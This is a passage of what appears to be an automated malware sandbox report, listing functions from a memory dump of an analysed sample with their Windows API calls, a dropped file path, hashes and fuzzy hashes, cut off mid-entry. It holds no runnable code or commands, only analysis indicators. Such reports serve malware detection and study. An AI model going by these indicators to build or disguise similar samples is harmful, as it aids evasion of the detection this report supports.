          • Instruction Fuzzy Hash: 39F05E311447059AEA2CDBA48D84BEB7BA8AFD4788F40481CF756925D8E7B0E044CF62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0113F490: _strcat.LIBCMT ref: 0113F4B6
          • _free.LIBCMT ref: 01159524
            • Part of subcall function 011335F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 01133681
            • Part of subcall function 011335F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 01133697
            • Part of subcall function 011335F0: __wsplitpath.LIBCMT ref: 011336C2
            • Part of subcall function 011335F0: _wcscpy.LIBCMT ref: 011336D7
            • Part of subcall function 011335F0: _wcscat.LIBCMT ref: 011336EC
            • Part of subcall function 011335F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 011336FC
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3938964917-3700514364
          • Opcode ID: 5c7321233e2b7191dd4f5adf5b0fad6ddde82eb70275c5048d1525594baf2d7e
          • Instruction ID: fd123cf98232230308a7d20fe0f6fde346a1e3f9d052edbada27b7ad51ebc646
          • Opcode Fuzzy Hash: 5c7321233e2b7191dd4f5adf5b0fad6ddde82eb70275c5048d1525594baf2d7e
          • Instruction Fuzzy Hash: 1591837190421AEFCF18EFA4C8809EE7779FF58318F108519E925A7341D775EA05CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F1D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
          Download Yara Rule
          APIs
          • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0115959F
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
            • Part of subcall function 0113F3B0: SHGetMalloc.SHELL32(0113F1FC), ref: 0113F3BD
            • Part of subcall function 0113F3B0: SHGetDesktopFolder.SHELL32(?,011D90E8), ref: 0113F3D2
            • Part of subcall function 0113F3B0: _wcsncpy.LIBCMT ref: 0113F3ED
            • Part of subcall function 0113F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 0113F427
            • Part of subcall function 0113F3B0: _wcsncpy.LIBCMT ref: 0113F440
            • Part of subcall function 0113F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0113F2AB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
          • String ID: X
          • API String ID: 85490731-3081909835
          • Opcode ID: 2809450ff008047034dea289e86082d5f4216e54171aadeff1eeeb55523b2f56
          • Instruction ID: 77eaa9e11e5673bb5f632492b1b5cb3f4db6f1e3b27f9aff83f549672e2ef7f5
          • Opcode Fuzzy Hash: 2809450ff008047034dea289e86082d5f4216e54171aadeff1eeeb55523b2f56
          • Instruction Fuzzy Hash: 2411E9B4E00349DBDB59DFD9D8407DEFBFAAF95308F408009D514AB285D7B4444ACBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01132AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc
          • String ID:
          • API String ID: 2388904642-0
          • Opcode ID: dd3964d59825cc3085b7ff070bc8d1b36f99ce6bd544e95679fa58fab9d314c8
          • Instruction ID: fe2e98cb8715502ce7ea57376398fb84062ce5f528854739c855abd959ddd560
          • Opcode Fuzzy Hash: dd3964d59825cc3085b7ff070bc8d1b36f99ce6bd544e95679fa58fab9d314c8
          • Instruction Fuzzy Hash: 34F1DF7590021ADBDB1CFF98C8819EEB774EF94304F514026D915AB258D735EE82CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113B1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ClearVariant
          • String ID:
          • API String ID: 1473721057-0
          • Opcode ID: 276de41da653b8b06cb5e3c25c5a69de88817a5781d27106077a95a68b7127e5
          • Instruction ID: b5282b628ee34dce5928d7eabae5bd4670a27451d6e72ccb89b0d1e078030883
          • Opcode Fuzzy Hash: 276de41da653b8b06cb5e3c25c5a69de88817a5781d27106077a95a68b7127e5
          • Instruction Fuzzy Hash: D291BF70A08204DFDB1CDFA8C8C4AADBBF5AF89304B14C569DD169B359E731E841CB66
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113C440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
          • Instruction ID: 08371dbf9117af15f94b68960112c8a5060a28c3e5919e8a9edcfe37b0a8883b
          • Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
          • Instruction Fuzzy Hash: 2151A675A0020AEBDB1CEF68C880FBEB7B8AF84308F048059E91997245E774E944C7D1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01196C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: bbe0bb2867d14e0eceedf7377bdd5d28e9e1769a5d8b32e33dec04c7b0a33238
          • Instruction ID: da0e808c231b0f5251b83fceb7d670aea0574e376c112b2b9a2eb70e4c3d048c
          • Opcode Fuzzy Hash: bbe0bb2867d14e0eceedf7377bdd5d28e9e1769a5d8b32e33dec04c7b0a33238
          • Instruction Fuzzy Hash: C541D4B1D00141AFDF19AF58C880BAE7BB9EF59704F058058F9699B340D735A986CBB2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113D8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON
          Download Yara Rule
          APIs
          • SystemParametersInfoW.USER32 ref: 0113D979
          • FreeLibrary.KERNEL32(?), ref: 0113D98E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FreeInfoLibraryParametersSystem
          • String ID:
          • API String ID: 3403648963-0
          • Opcode ID: d819c2b3fe01e4fb78153fe436f4e8319598fd15d4801377c86306b58a5eea94
          • Instruction ID: 9e2047244a8ddf9e24bdc41d055cf9f58fda201edccceb9d87214dcd949d2b55
          • Opcode Fuzzy Hash: d819c2b3fe01e4fb78153fe436f4e8319598fd15d4801377c86306b58a5eea94
          • Instruction Fuzzy Hash: AB21BBB19053059FD318EF59E88490ABBA4FBD8318F40493DE868A3288D771A985CF92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01133C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _malloc_wcscpy_wcslen
          • String ID:
          • API String ID: 245337311-0
          • Opcode ID: 52cc4eb2ac936315b98f2724c805e9c060b283cf0813befe4062fc292516d753
          • Instruction ID: 7763c04f490c2cf9a7b48566df900e8791e7fe67f1e07898ce09db6cdad98f83
          • Opcode Fuzzy Hash: 52cc4eb2ac936315b98f2724c805e9c060b283cf0813befe4062fc292516d753
          • Instruction Fuzzy Hash: A31158B0600640AFD328DF69C445E26F7E4FF95615F04C82EE86A8BB90D775F881CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118E400, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,?), ref: 0118E454
          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0118E467
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: PrivateProfileStringWrite$FullNamePath
          • String ID:
          • API String ID: 3876400906-0
          • Opcode ID: 5ce835613c844060da51812305d71f5eab2634d200bdd39a988075c40e95aa91
          • Instruction ID: c05ac302242e121aaf12940ae2a073b430158025b5a49b820711241bf0384c60
          • Opcode Fuzzy Hash: 5ce835613c844060da51812305d71f5eab2634d200bdd39a988075c40e95aa91
          • Instruction Fuzzy Hash: 55018072A102196BD714FB64DC44F6AB7ECEB94724F14C69AAC54E7240DB70FC018BE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011407A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
          Download Yara Rule
          APIs
          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0113E094,?,00000001,?,01133653,?), ref: 011407CA
          • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0113E094,?,00000001,?,01133653,?), ref: 01156296
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: d89a83acbc85fdf24533534d0d3773edfdef26011cc897eb5654d0f599bda423
          • Instruction ID: f0d2b10a1dedfea39e37f857cd004d50f5102cdf46636942d5cf942311f417cf
          • Opcode Fuzzy Hash: d89a83acbc85fdf24533534d0d3773edfdef26011cc897eb5654d0f599bda423
          • Instruction Fuzzy Hash: F8013C30384B01BBF3795A289C4BF913A90AF49F25F204714BBE5BE1E1D3F46482CA45
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011316A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
          Download Yara Rule
          APIs
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 011316E5
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • _wcscat.LIBCMT ref: 01158BC8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FullNamePath_memmove_wcscat_wcslen
          • String ID:
          • API String ID: 189345764-0
          • Opcode ID: 33e254e3b7c97fe8a1214b85e928bccb17b14b3edca9db258cd8fac1ea4d74a7
          • Instruction ID: a7bd8478e4328138db284f1a180aecbb2425a8a09786a7d7c0f56638d4f857b1
          • Opcode Fuzzy Hash: 33e254e3b7c97fe8a1214b85e928bccb17b14b3edca9db258cd8fac1ea4d74a7
          • Instruction Fuzzy Hash: 890192B464020DA7CB6CFFA5D985ADE73B8AF69304F004599DD05A7204EB309A848BA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01144966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01147E9A: __getptd_noexit.LIBCMT ref: 01147E9A
          • __lock_file.LIBCMT ref: 011449AD
            • Part of subcall function 01145391: __lock.LIBCMT ref: 011453B6
          • __fclose_nolock.LIBCMT ref: 011449B8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
          • String ID:
          • API String ID: 2800547568-0
          • Opcode ID: 30c3c016a5675a89fc785bb8084fe862988e258454de8a7488ffcabd95278889
          • Instruction ID: 8c04589a0937646c2364952786926f9ffbc0430e8d7a070afea318d2a2c70bb4
          • Opcode Fuzzy Hash: 30c3c016a5675a89fc785bb8084fe862988e258454de8a7488ffcabd95278889
          • Instruction Fuzzy Hash: F1F0B4759007179BEB2CABB9C80079E7BA06F15B3CF118718D474BA5D0DB784902AB56
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113D5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
          Download Yara Rule
          APIs
          • timeGetTime.WINMM ref: 0113D5DC
            • Part of subcall function 01139430: PeekMessageW.USER32 ref: 011394B6
          • Sleep.KERNEL32(00000000), ref: 0115E125
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessagePeekSleepTimetime
          • String ID:
          • API String ID: 1792118007-0
          • Opcode ID: e75e16f61c4abc54071614b08ecdcf1bd4e0d526fd1acfcb6a062ea929daf42e
          • Instruction ID: 7cc0212178ea8afc955b6d2d17f59f4b80567cc3c757f43edf64b388bd239687
          • Opcode Fuzzy Hash: e75e16f61c4abc54071614b08ecdcf1bd4e0d526fd1acfcb6a062ea929daf42e
          • Instruction Fuzzy Hash: B9F08C752406039FD358EF69D488B66FBE8AF95364F00417AE82AC7344DBB0B804CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011415A2, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
          Download Yara Rule
          APIs
          • ___crtCorExitProcess.LIBCMT ref: 011415AA
            • Part of subcall function 01141577: GetModuleHandleW.KERNEL32(mscoree.dll,?,011415AF,?,?,0114350A,000000FF,0000001E,00000001,00000000,00000000,?,01146A35,?,00000001,?), ref: 01141581
            • Part of subcall function 01141577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01141591
          • ExitProcess.KERNEL32 ref: 011415B3
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExitProcess$AddressHandleModuleProc___crt
          • String ID:
          • API String ID: 2427264223-0
          • Opcode ID: 551d641046cf50220ab5aec4660ff604de30368c3164aa2f8846d06be4e4d7f2
          • Instruction ID: 51ae3e02d4528f49b3204036464d173f7b816d272a884c11f133d385de071821
          • Opcode Fuzzy Hash: 551d641046cf50220ab5aec4660ff604de30368c3164aa2f8846d06be4e4d7f2
          • Instruction Fuzzy Hash: 54B09231005148BBCB192F12EC4E88D3F2AEB826A0B144024F92909130DF72BED29AC0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01133D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON
          Download Yara Rule
          APIs
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0113378C,?,?,?,00000010), ref: 01133D38
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 01133D71
            • Part of subcall function 01133DA0: _memmove.LIBCMT ref: 01133DD7
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide$_malloc_memmove
          • String ID:
          • API String ID: 961785871-0
          • Opcode ID: 833ba1a9d4df50f66678169d63747bf2894a7d05f4789e44e045e230041e5962
          • Instruction ID: 52cda089d15fd2d8e379b9772cca7a2d48899406fd08f43051a5c28135245d8b
          • Opcode Fuzzy Hash: 833ba1a9d4df50f66678169d63747bf2894a7d05f4789e44e045e230041e5962
          • Instruction Fuzzy Hash: F901AD723502007FE758AA68AC8AF6B7B9CEB94B10F044025FA09DF2C0DAB1EC408261
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119F94D, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 0119FAAB
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _malloc_memmove
          • String ID:
          • API String ID: 1183979061-0
          • Opcode ID: 6ecc1d65cee3878cb8a37e0fd51739bd65560edfe5950fc89edd5e9a0728b520
          • Instruction ID: 21fd052df90a327d9e84f9c9c027bba50f78e707e25b0d53e57ae9d17ca00def
          • Opcode Fuzzy Hash: 6ecc1d65cee3878cb8a37e0fd51739bd65560edfe5950fc89edd5e9a0728b520
          • Instruction Fuzzy Hash: 4E51F5762043036BDB08EF68CD81F5AB7A9BFA8618F044518F9658B341D735EC06C7A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113B650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 53fa7824ccd7e712625b3220eed34661da1da2e085ece074da8426240376003e
          • Instruction ID: 53075455ec287f2b02d656e99f52ba0057f9eba09cf7fb6e7dbed7b9d79a26b9
          • Opcode Fuzzy Hash: 53fa7824ccd7e712625b3220eed34661da1da2e085ece074da8426240376003e
          • Instruction Fuzzy Hash: BA31FDF4A08601EBDB2DEF2DC8C1F26B7A8BF90604B184919D9058B316F775F484D79A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119B5B4, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free
          • String ID:
          • API String ID: 269201875-0
          • Opcode ID: 495f52db772368a768388c24ea7b3457934a9ce9ade51b2ebebde63422acb429
          • Instruction ID: 57d21eef13c56506398a05f75bb74f53ae0241b5d8b5d1d11252bbfaed7701d7
          • Opcode Fuzzy Hash: 495f52db772368a768388c24ea7b3457934a9ce9ade51b2ebebde63422acb429
